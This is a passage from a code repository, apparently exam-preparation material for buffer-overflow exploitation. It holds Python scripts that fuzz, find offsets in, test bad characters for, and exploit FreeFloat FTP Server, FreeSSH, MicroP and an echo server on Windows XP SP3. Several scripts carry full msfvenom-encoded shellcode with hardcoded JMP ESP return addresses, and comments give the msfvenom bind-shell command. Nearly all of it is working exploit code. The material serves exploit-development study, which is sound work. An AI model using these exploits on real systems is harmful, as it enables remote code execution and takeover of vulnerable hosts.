"\xf4\xec\xc9\xa9\x23\x25\x6e\xd1\x01\x1d\x18\x9a\x43\x9a\x27" 25 | "\x1b\x46\x8c\xbf\x90\x85\x08\xde\xa6\x83\x38\xb7\x31\x59\xa9" 26 | "\xfa\xa0\x5e\xe0\x6c\x40\xcc\x6f\x6c\x0f\xed\x27\x3b\x58\xc3" 27 | "\x31\xa9\x74\x7a\xe8\xcf\x84\x1a\xd3\x4b\x53\xdf\xda\x52\x16" 28 | "\x5b\xf9\x44\xee\x64\x45\x30\xbe\x32\x13\xee\x78\xed\xd5\x58" 29 | "\xd3\x42\xbc\x0c\xa2\xa8\x7f\x4a\xab\xe4\x09\xb2\x1a\x51\x4c" 30 | "\xcd\x93\x35\x58\xb6\xc9\xa5\xa7\x6d\x4a\xd5\xed\x2f\xfb\x7e" 31 | "\xa8\xba\xb9\xe2\x4b\x11\xfd\x1a\xc8\x93\x7e\xd9\xd0\xd6\x7b" 32 | "\xa5\x56\x0b\xf6\xb6\x32\x2b\xa5\xb7\x16") 33 | 34 | 35 | buffer = "\x90"*40 36 | buffer += shellcode 37 | buffer += "\x90"*(1036-40-len(shellcode)) 38 | buffer += "\x34\xf3\x22\x00" 39 | 40 | sock.send(buffer) 41 | 42 | sock.close() 43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_4/echo_server_badchars1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*1036 10 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 11 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 13 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 14 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 15 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 16 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 17 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 18 | buffer += "B" * 400 19 | 20 | sock.send(buffer) 21 | 22 | sock.close() 23 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Echo_Server/echo_server_4/echo_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 6 | 7 | sock.connect(('172.16.73.129', 9000)) 8 | 9 | buffer = "A"*2200 10 | 11 | sock.send(buffer) 12 | 13 | sock.close() 14 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/FreeSSH/freessh_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | import time 5 | 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | 8 | sock.connect(("172.16.73.129", 22)) 9 | 10 | message = sock.recv(1000) 11 | 12 | print message 13 | 14 | buffer = ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 15 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 17 | buffer += "A"*22000 18 | buffer += "\r\n" 19 | 20 | sock.send(buffer) 21 | time.sleep(5) 22 | sock.close() -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/FreeSSH/freessh_eip_b_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys 4 | import time 5 | 6 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | 8 | sock.connect(("172.16.73.129", 22)) 9 | 10 | message = sock.recv(1000) 11 | 12 | print message 13 | 14 | buffer = ("\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" 15 | "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" 16 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde") 17 | buffer += "A"*1055 18 | buffer += "B"*4 19 | buffer += "C"*21000 20 | buffer += "\r\n" 21 | 22 | sock.send(buffer) 23 | time.sleep(5) 24 | sock.close() 25 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Freefloat_FTP_Server/freefloat_ftp_server_eip1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | FreeFloat FTP Server Exploit Find Offset 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | 15 | print banner 16 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 17 | #shellcode = ( 18 | 19 | offset = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 20 | 21 | #nowjump 22 | #bufferandshellcode 23 | sploit = offset 24 | 25 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 26 | try: 27 | print "\nDestroy them with lazers..." 28 | s.connect(('172.16.73.129',21)) 29 | s.recv(1024) 30 | s.send('USER anonymous\r\n') 31 | s.recv(1024) 32 | s.send('PASS anonymous\r\n') 33 | s.recv(1024) 34 | s.send('MKD ' + sploit + '\r\n\n') 35 | s.recv(1024) 36 | s.send('QUIT\r\n') 37 | s.close 38 | print "\nFire in the hole! Go pick up the pieces!" 39 | except: 40 | print "ERROR! Shutting it dooooown.." 41 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Freefloat_FTP_Server/freefloat_ftp_server_eip2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | FreeFloat FTP Server Exploit - Offset & JMP ESP 10 | #----------------------------------------------# 11 | """ 12 | 13 | print banner 14 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 15 | #shellcode = () 16 | 17 | #EIP = 69413269 -> offset at 247 18 | offset = 'A'*247 19 | 20 | #JMP ESP = !mona jmp -r esp -> 0x7c9d30d7 or \xd7\x30\x9d\x7c 21 | #nowjump = '\xd7\x30\x9d\x7c' 22 | nowjump = 'B'*4 23 | 24 | #bufferandshellcode 25 | sploit = offset + nowjump + 'C'*(366) 26 | 27 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | try: 29 | print "\nDestroy them with lazers..." 30 | s.connect(('172.16.73.129',21)) 31 | s.recv(1024) 32 | s.send('USER anonymous\r\n') 33 | s.recv(1024) 34 | s.send('PASS anonymous\r\n') 35 | s.recv(1024) 36 | s.send('MKD ' + sploit + '\r\n\n') 37 | s.recv(1024) 38 | s.send('QUIT\r\n') 39 | s.close 40 | print "\nFire in the hole! Go pick up the pieces!" 41 | except: 42 | print "ERROR! Shutting it dooooown.." 43 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/Freefloat_FTP_Server/freefloat_ftp_server_fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import sys 5 | import struct 6 | 7 | banner = """ 8 | #----------------------------------------------# 9 | FreeFloat FTP Server Exploit Fuzzer 10 | 1. python freefloat_ftp_server_fuzz.py 11 | #----------------------------------------------# 12 | """ 13 | 14 | print banner 15 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 16 | #shellcode = ( 17 | 18 | offset = "A" *247 19 | #nowjump 20 | #bufferandshellcode 21 | sploit = offset 22 | 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | try: 25 | print "\nDestroy them with lazers..." 26 | s.connect(('172.16.73.129',21)) 27 | s.recv(1024) 28 | s.send('USER anonymous\r\n') 29 | s.recv(1024) 30 | s.send('PASS anonymous\r\n') 31 | s.recv(1024) 32 | s.send('MKD ' + sploit + '\r\n\n') 33 | s.recv(1024) 34 | s.send('QUIT\r\n') 35 | s.close 36 | print "\nFire in the hole! Go pick up the pieces!" 37 | except: 38 | print "ERROR! Shutting it dooooown.." 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/MicroP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/MicroP.exe -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars1.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars1.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars2.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars3.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars3.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars4.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_eip_badchars4.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt1.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt1.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt2.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt2.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt3.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt3.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt4.mppl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mrjak3/OSCE-Preparation/d804f3073de374367e64f62ea5ab1eedcd039430/BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/exploit_shellcode_attempt4.mppl -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_crash.mppl", "wb") 4 | 5 | buffer = "A"*4000 6 | 7 | file.write(buffer) 8 | 9 | file.close() 10 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_b_overwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_b_overwrite.mppl", "wb") 4 | 5 | buffer= "A"*1276 6 | buffer+= "B"*4 7 | buffer+= "C"*2000 8 | 9 | file.write(buffer) 10 | 11 | file.close() 12 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars1.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars2.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars3.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_eip_badchars4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_eip_badchars4.mppl", "wb") 4 | 5 | buffer = "A"*1276 6 | buffer += "B"*4 7 | buffer += ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 8 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 10 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 11 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 12 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 13 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 14 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 15 | 16 | file.write(buffer) 17 | 18 | file.close() 19 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt1.mppl", "wb") 4 | 5 | shellcode = ("\xb8\x91\x29\xbd\xbb\xdb\xcd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1" 6 | "\x53\x31\x47\x12\x83\xc7\x04\x03\xd6\x27\x5f\x4e\x24\xdf\x1d" 7 | "\xb1\xd4\x20\x42\x3b\x31\x11\x42\x5f\x32\x02\x72\x2b\x16\xaf" 8 | "\xf9\x79\x82\x24\x8f\x55\xa5\x8d\x3a\x80\x88\x0e\x16\xf0\x8b" 9 | "\x8c\x65\x25\x6b\xac\xa5\x38\x6a\xe9\xd8\xb1\x3e\xa2\x97\x64" 10 | "\xae\xc7\xe2\xb4\x45\x9b\xe3\xbc\xba\x6c\x05\xec\x6d\xe6\x5c" 11 | "\x2e\x8c\x2b\xd5\x67\x96\x28\xd0\x3e\x2d\x9a\xae\xc0\xe7\xd2" 12 | "\x4f\x6e\xc6\xda\xbd\x6e\x0f\xdc\x5d\x05\x79\x1e\xe3\x1e\xbe" 13 | "\x5c\x3f\xaa\x24\xc6\xb4\x0c\x80\xf6\x19\xca\x43\xf4\xd6\x98" 14 | "\x0b\x19\xe8\x4d\x20\x25\x61\x70\xe6\xaf\x31\x57\x22\xeb\xe2" 15 | "\xf6\x73\x51\x44\x06\x63\x3a\x39\xa2\xe8\xd7\x2e\xdf\xb3\xbf" 16 | "\x83\xd2\x4b\x40\x8c\x65\x38\x72\x13\xde\xd6\x3e\xdc\xf8\x21" 17 | "\x40\xf7\xbd\xbd\xbf\xf8\xbd\x94\x7b\xac\xed\x8e\xaa\xcd\x65" 18 | "\x4e\x52\x18\x13\x46\xf5\xf3\x06\xab\x45\xa4\x86\x03\x2e\xae" 19 | "\x08\x7c\x4e\xd1\xc2\x15\xe7\x2c\xed\x08\xa4\xb9\x0b\x40\x44" 20 | "\xec\x84\xfc\xa6\xcb\x1c\x9b\xd9\x39\x35\x0b\x91\x2b\x82\x34" 21 | "\x22\x7e\xa4\xa2\xa9\x6d\x70\xd3\xad\xbb\xd0\x84\x3a\x31\xb1" 22 | "\xe7\xdb\x46\x98\x9f\x78\xd4\x47\x5f\xf6\xc5\xdf\x08\x5f\x3b" 23 | "\x16\xdc\x4d\x62\x80\xc2\x8f\xf2\xeb\x46\x54\xc7\xf2\x47\x19" 24 | "\x73\xd1\x57\xe7\x7c\x5d\x03\xb7\x2a\x0b\xfd\x71\x85\xfd\x57" 25 | "\x28\x7a\x54\x3f\xad\xb0\x67\x39\xb2\x9c\x11\xa5\x03\x49\x64" 26 | "\xda\xac\x1d\x60\xa3\xd0\xbd\x8f\x7e\x51\xcd\xc5\x22\xf0\x46" 27 | "\x80\xb7\x40\x0b\x33\x62\x86\x32\xb0\x86\x77\xc1\xa8\xe3\x72" 28 | "\x8d\x6e\x18\x0f\x9e\x1a\x1e\xbc\x9f\x0e") 29 | 30 | buffer= "A"*1276 31 | buffer+= "\xd7\x30\x9d\x7c" 32 | buffer+= "\x90"*100 33 | buffer+= shellcode 34 | buffer+= "C"*2000 35 | 36 | file.write(buffer) 37 | 38 | file.close() 39 | -------------------------------------------------------------------------------- /BoF/Vanilla-EIP-Overwrite-BoF/windows_xp_sp3/MicroP/microp_shellcode_attempt2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | file = open("exploit_shellcode_attempt2.mppl", "wb") 4 | 5 | #msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LHOST=172.16.73.129 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -f c 6 | 7 | shellcode = 